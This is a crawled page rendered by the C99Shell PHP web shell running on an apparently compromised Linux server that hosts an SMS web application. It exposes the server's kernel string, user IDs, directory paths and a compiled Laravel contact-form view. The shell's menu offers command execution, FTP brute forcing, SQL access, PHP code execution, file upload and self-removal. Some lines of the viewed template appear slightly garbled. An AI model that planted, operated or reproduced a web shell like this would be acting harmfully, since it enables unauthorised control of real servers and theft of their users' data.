!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/storage/framework/views/   drwxrwxrwx
Free 28.36 GB of 117.98 GB (24.04%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     fec3b94cae60051a72a15626696f9528.php (4.49 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="form-group">
    <label for="number"><?php echo app('translator')->get('customer.number'); ?></label>
    <div class="input-group mb-3">
        <div class="input-group-prepend">
            <select <?php echo e(isset($contact)?'disabled':''); ?> class="form-control" name="contact_dial_code" id="contact_dial_code">
                <?php $__currentLoopData getCountryCode(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key=>$code): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                    <option <?php echo e(isset($contact) && $contact->contact_dial_code=="+".$code['code']?'selected':''); ?> value="+<?php echo e($code['code']); ?>">+<?php echo e($code['code']); ?></option>
                <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
            </select>
        </div>
        <input <?php echo e(isset($contact)?'readonly':''); ?> value="<?php echo e(isset($contact)?$contact->number:old('number')); ?>" type="text" name="number" class="form-control" id="number"
               placeholder="Enter number">
    </div>


</div>

<div class="form-group">
    <label for="first_name"><?php echo app('translator')->get('customer.first_name'); ?></label>
    <input value="<?php echo e(isset($contact) && $contact->first_name?$contact->first_name:old('first_name')); ?>" type="text" name="first_name" class="form-control" id="first_name"
           placeholder="<?php echo app('translator')->get('customer.first_name'); ?>">
</div>

<div class="form-group">
    <label for="last_name"><?php echo app('translator')->get('customer.last_name'); ?></label>
    <input value="<?php echo e(isset($contact) && $contact->last_name?$contact->last_name:old('last_name')); ?>" type="text" name="last_name" class="form-control" id="last_name"
           placeholder="<?php echo app('translator')->get('customer.last_name'); ?>">
</div>

<div class="form-group">
    <label for="address"><?php echo app('translator')->get('customer.address'); ?></label>
    <input value="<?php echo e(isset($contact) && $contact->address?$contact->address:old('address')); ?>" type="text" name="address" class="form-control" id="address"
           placeholder="<?php echo app('translator')->get('customer.address'); ?>">
</div>

<div class="form-group">
    <label for="city"><?php echo app('translator')->get('customer.city'); ?></label>
    <input value="<?php echo e(isset($contact) && $contact->city?$contact->city:old('city')); ?>" type="text" name="city" class="form-control" id="city"
           placeholder="<?php echo app('translator')->get('customer.city'); ?>">
</div>

<div class="form-group">
    <label for="state"><?php echo app('translator')->get('customer.state'); ?></label>
    <input value="<?php echo e(isset($contact) && $contact->state?$contact->state:old('state')); ?>" type="text" name="state" class="form-control" id="state"
           placeholder="<?php echo app('translator')->get('customer.state'); ?>">
</div>

<div class="form-group">
    <label for="zip_code"><?php echo app('translator')->get('customer.zip_code'); ?></label>
    <input value="<?php echo e(isset($contact) && $contact->zip_code?$contact->zip_code:old('zip_code')); ?>" type="text" name="zip_code" class="form-control" id="zip_code"
           placeholder="<?php echo app('translator')->get('customer.zip_code'); ?>">
</div>
<div class="form-group">
    <label for="email"><?php echo app('translator')->get('customer.email'); ?></label>
    <input value="<?php echo e(isset($contact) && $contact->email$contact->email:old('email')); ?>" type="text" name="email" class="form-control" id="email"
           placeholder="<?php echo app('translator')->get('customer.email'); ?>">
</div>

<div class="form-group">
    <label for="company"><?php echo app('translator')->get('customer.company'); ?></label>
    <input value="<?php echo e(isset($contact) && $contact->company?$contact->company:old('company')); ?>" type="text" name="company" class="form-control" id="company"
           placeholder="<?php echo app('translator')->get('customer.company'); ?>">
</div>

<div class="form-group">
    <label for="note"><?php echo app('translator')->get('customer.note'); ?></label>
    <textarea type="text" name="note" class="form-control" id="note" placeholder="<?php echo app('translator')->get('customer.note'); ?>"><?php echo e(isset($contact) && $contact->note?$contact->note:old('note')); ?></textarea>
</div>
<?php /**PATH /home/picotech/domains/sms.picotech.app/public_html/resources/views/customer/contacts/form.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--